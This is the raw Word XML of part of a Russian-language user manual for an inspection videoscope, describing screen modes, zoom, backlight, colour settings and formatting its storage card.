        <w:t>Заставка</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После включения электропитания видеоскопа на экране его дисплея </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>появится заставка. Данная заставка указывает на загрузку программного обеспечения видеоскопа. После завершения этапа включения заставка автоматически сменится изображением, передаваемым видеоголовкой в режиме реального времени.</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0016" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3041650</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>125730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1473200" cy="1101725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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320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5D4582" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005D4582">
        <w:t>Рабочий экран (изображение, передаваемое видеоголовкой в режиме реального</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4582">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4582">
        <w:t>времени)</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Рабочий экран используется основную часть времени обследования. На экране дисплея отображается интерактивное изображение, передаваемое видеоголовкой. В этом режиме возможно изменение масштаба изображений, регулировка подсветки экрана, а также поворот, просмотр и сохранение фотоснимков и видеозаписей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005D4582" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005D4582">
        <w:t>Переключение между режимом фотосъемки и видеозаписи</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По умолчанию после включения электропитания видеоскоп переходит в режим фотосъемки. Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>с изображением фото-/видеокамеры</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, чтобы переключиться в режим фото- или видеосъемки необходимым образом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005D4582" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005D4582">
        <w:t>Регулировка подсветки экрана</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4582">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4582">
        <w:t>дисплея</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 режиме фотосъемки нажмите кнопку со стрелкой </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вправо </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>влево</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы увеличить или уменьшить подсветку экрана дисплея видеоскопа. Во время регулировки подсветки на дисплее отображается индикатор яркости. </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1040" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3037205</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>126365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1482090" cy="1111250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="16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2090"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5D4582" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005D4582">
        <w:t>Масштабирование</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Для увеличения или уменьшения масштаба изображения нажмите кнопку со стрелкой </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вверх </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вниз </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">во время нахождения в режиме фотосъемки. Во время регулировки масштаба на дисплее отображается индикатор масштаба. </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3088" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3052445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>127000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1453515" cy="1111250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="16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3515"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5D4582" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005D4582">
        <w:lastRenderedPageBreak/>
        <w:t>Переход в окно основных</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4582">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4582">
        <w:t>параметров</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 режиме рабочего экрана нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>кнопку настройки параметров</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, чтобы перейти в окно основных параметров. Нажатие кнопки возврата позволяет в любое время вернуться обратно к рабочему экрану.</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2064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3041650</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>125730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1473200" cy="1101725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="16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320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Выбор цветного или монохромного режима отображения</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>изображений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41"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 окне </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Настройка] выберите пункт меню </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Color</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Monochrome</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Цветной или монохромный] и нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, после чего на экране дисплея отобразится окно </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Color</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Monochrome</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Цветной или монохромный].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1565"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-- По умолчанию используется цветной режим показа</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-26"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>изображений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1565"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1565"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1447800" cy="107442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7800" cy="1074420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="1565"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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влево/вправо</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, выберите необходимый параметр,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Форматирование накопителя</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>данных</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В окне </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup [Настройка] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">выберите пункт меню </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Format Media [Форматировать носитель данных] </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, после чего на экране дисплея отобразится запрос на подтверждение форматирования.</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4112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3041650</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>126365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1459230" cy="1120140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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923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Если носитель данных необходимо отформатировать (в большинстве случаев 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используйте кнопку со стрелкой </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>влево/вправо</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы выбрать </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Да]</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, после чего нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>для начала форматирования. После завершения форматирования произойдет переход в окно основных параметров.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Если форматирование носителя данных не требуется, используя кнопки со стрелками </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>влево/вправо</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Нет]</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, после чего нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы вернуться в предыдущее меню,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B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ПРИМЕЧАНИЕ. Перед выполнением форматирования убедитесь в необходимости этой операции, так как все файлы, хранящиеся на носителе, будут безвозвратно удалены!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1447800" cy="1074420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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7800" cy="1074420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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ab/>
        <w:t xml:space="preserve">Используя кнопки со стрелками </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">влево/вправо </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">перейдите в необходимое поле, после чего используйте кнопки со стрелками </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>вверх/вниз</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы увеличить или уменьшить значение выбранного поля. После завершения настройки нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы сохранить конфигурацию и закрыть окно, или нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>возврата</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, чтобы завершить настройку без сохранения изменений.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Выбор языка</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>интерфейса</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В окне </w:t>
      </w:r>
